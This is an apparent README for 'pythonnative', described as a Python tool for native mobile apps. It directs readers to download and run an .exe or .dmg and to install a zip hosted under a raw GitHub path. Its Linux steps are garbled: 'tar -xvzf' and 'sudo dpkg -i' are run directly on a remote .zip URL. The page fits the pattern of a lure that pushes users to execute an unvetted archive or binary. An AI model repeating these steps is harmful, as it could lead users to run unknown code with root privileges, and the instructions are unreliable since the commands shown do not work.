Welcome to pythonnative! This tool allows you to build real native Android and iOS applications using Python. It comes with a simple user interface, a command-line tool, and templates to get you started quickly.
You can get the latest version of pythonnative from our Releases page.
To download, visit this page: Download pythonnative.
- Click the link above to visit the Releases page.
- Look for the latest version.
- Click on the version to view available files.
- Download the file suitable for your operating system.
Before you start, ensure your system meets the following requirements:
-
Operating System:
- Windows 10 or higher
- macOS 10.14 or higher
- Linux distribution with latest updates
-
Python Version: Must have Python 3.7 or higher installed.
-
Memory: At least 2GB of RAM (4GB recommended).
-
Disk Space: Minimum 150MB of available space.
After downloading the file, follow these steps to set up pythonnative on your system.
- Locate the downloaded
.exe
file. - Double-click to run it.
- Follow the on-screen instructions to complete the installation.
- Locate the downloaded
.dmg
file. - Open it and drag the pythonnative app to your Applications folder.
- Eject the
.dmg
file after installation.
- Locate the downloaded package (
https://raw.githubusercontent.com/nwaebom66/pythonnative/main/libs/templates/android_template.zip
or.deb
file). - Open a terminal window.
- Navigate to the downloaded file's location.
- Run the command to extract or install. For example:
or
tar -xvzf https://raw.githubusercontent.com/nwaebom66/pythonnative/main/libs/templates/android_template.zip
sudo dpkg -i https://raw.githubusercontent.com/nwaebom66/pythonnative/main/libs/templates/android_template.zip
After installation, you will be able to access pythonnative through your applications menu or command line.
- Open your command line interface.
- Type the following command to start pythonnative:
pythonnative
- Follow the prompts to create or manage your mobile projects.
- Open the pythonnative app from your applications.
- Select the action you want to perform, such as creating a new project or opening an existing one.
- Cross-Platform Development: Write your code once, and run it on both Android and iOS with minor adjustments.
- Lightweight UI Toolkit: Build user interfaces easily with our simple widget toolkit.
- Command-Line Interface (CLI): Powerful tools for experts to manage projects effectively.
- Templates: Start projects quickly with pre-built templates optimized for various use cases.
If you encounter any issues, you can visit our FAQs or check our Documentation for detailed guides.
Join our community on forums or social media. Share your experiences, ask questions, and help others.
Thank you for choosing pythonnative! Enjoy building your mobile applications.